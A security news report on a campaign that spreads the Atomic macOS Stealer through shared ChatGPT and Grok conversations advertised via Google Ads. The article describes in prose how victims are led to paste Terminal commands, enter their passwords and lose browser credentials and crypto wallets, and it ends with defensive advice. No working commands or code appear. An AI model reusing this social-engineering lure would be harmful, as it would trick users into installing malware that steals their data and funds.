Mac users are facing a sophisticated new threat as cybercriminals are weaponizing artificial intelligence tools like ChatGPT and Grok, combined with Google Ads, to distribute the Atomic macOS Stealer (AMOS). This evolving social engineering tactic exploits user trust in AI-generated content to trick Mac users into executing malicious commands that compromise their systems.
The campaign specifically targets users searching for common troubleshooting solutions, such as methods to clear disk space on macOS. Attackers are creating shareable AI chat links that offer seemingly legitimate, AI-generated step-by-step instructions hosted on trusted domains. These links are then promoted via paid Google advertising, directing unsuspecting users to execute malicious terminal commands.
Attack Mechanism and Infection Chain
The infection process begins when a Mac user performs a Google search for technical assistance. Sponsored advertisements or highly ranked organic results lead victims to shared ChatGPT or Grok conversations that appear to offer helpful system maintenance guidance. These AI-generated conversations contain carefully crafted instructions designed to prompt users to open their Terminal application.
Victims are then instructed to paste what seems like a harmless command into the Terminal. This command, however, downloads a malicious script from an external domain controlled by the attackers. The script repeatedly requests the user’s system password, masquerading as a legitimate system operation. Once the correct credentials are provided, the script installs the AMOS infostealer and a persistent backdoor, granting attackers long-term remote access to the compromised machine.
The AMOS stealer is designed to immediately target and harvest sensitive information. This includes browser data from Chrome, Safari, and Firefox, such as saved passwords, cookies, and active login sessions. Furthermore, it specifically targets cryptocurrency wallets, including Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, extracting seed phrases and private keys that enable rapid theft of digital assets. Personal files are also targeted for exfiltration.
This attack method is particularly effective due to its ability to bypass traditional security measures by appearing entirely legitimate. The malicious instructions are hosted on official ChatGPT and Grok websites, and the use of paid Google advertising adds an additional layer of credibility. Users naturally trust results appearing on reputable platforms like OpenAI and X.AI domains, making them more susceptible to the social engineering employed.
Organizations and individual Mac users should remain vigilant for unsigned applications requesting system passwords, unusual Terminal activity, and unexpected network connections to unfamiliar domains. Security teams are advising users to be aware that instructions appearing on trusted AI platforms can be compromised through social engineering. Any guidance that requests the execution of Terminal commands should be independently verified through official support channels before implementation.